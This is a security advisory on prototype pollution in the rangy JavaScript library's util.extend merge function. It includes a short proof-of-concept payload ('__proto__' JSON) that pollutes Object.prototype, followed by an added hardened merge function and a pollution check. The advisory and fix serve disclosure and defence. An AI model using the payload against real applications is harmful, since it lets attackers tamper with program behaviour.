Affected versions of this package are vulnerable to Prototype Pollution. Rangy runs the risk of Prototype Pollution when using the function extend in file rangy-core.js. The function uses a recursive merge, which lets an attacker modify properties of Object.prototype. The risk is located here:

rangy/lib/rangy-core.js, line 167 in 8aea7eb
rangy/lib/rangy-core.js, line 165 in 8aea7eb

and the PoC is as follows:

```javascript
var rangy = require("rangy");
// The payload key is "__proto__" (the underscores were lost in extraction);
// a plain "proto" key would not reach Object.prototype.
var BAD_JSON = JSON.parse('{"__proto__":{"test":123}}');
console.log({}.test); // undefined
rangy.util.extend({}, BAD_JSON, {});
console.log({}.test); // 123
```
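For reference, here is a hardened recursive merge of the kind a fix for this issue would need, together with a small check that Object.prototype stays clean after merging untrusted JSON. This is an added example, not rangy's code; the function names safeExtend, isPlainObject and prototypeIsPolluted, and the sample payload UNTRUSTED, are assumptions constructed for illustration.

```javascript
// Added example (not rangy's code): a deep-merge that refuses to walk into
// prototype-controlling keys, plus a check that Object.prototype is untouched.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Only recurse into plain objects; class instances, arrays and null are
// copied by reference so a nested object cannot smuggle in a prototype setter.
function isPlainObject(value) {
  if (value === null || typeof value !== "object") return false;
  const proto = Object.getPrototypeOf(value);
  return proto === Object.prototype || proto === null;
}

// Hardened recursive merge: copies only own enumerable keys of `source`
// into `target`, skips keys that would reach the prototype chain, and
// creates a fresh own property before recursing so an inherited value
// is never used as the recursion target.
function safeExtend(target, source, deep = true) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (deep && isPlainObject(value)) {
      if (
        !Object.prototype.hasOwnProperty.call(target, key) ||
        !isPlainObject(target[key])
      ) {
        target[key] = {};
      }
      safeExtend(target[key], value, deep);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Detection helper: true if any of the given names became an own property
// of Object.prototype, which is what a successful pollution looks like.
function prototypeIsPolluted(names) {
  return names.some((n) =>
    Object.prototype.hasOwnProperty.call(Object.prototype, n)
  );
}

// Constructed sample input (hypothetical) shaped like the issue's payload,
// plus a benign nested key to show normal merging still works.
const UNTRUSTED = JSON.parse(
  '{"__proto__":{"test":123},"ok":{"nested":1}}'
);

// Merge the untrusted input and report whether anything leaked.
function demo() {
  const merged = safeExtend({}, UNTRUSTED);
  return {
    merged,
    polluted: prototypeIsPolluted(["test"]),
    leakedToFreshObject: ({}).test !== undefined,
  };
}

console.log(JSON.stringify(demo()));
```

JSON.parse creates "__proto__" as an own data property rather than invoking the setter, so Object.keys does list it; the whole point of the skip is to stop the merge from assigning through that name on the target.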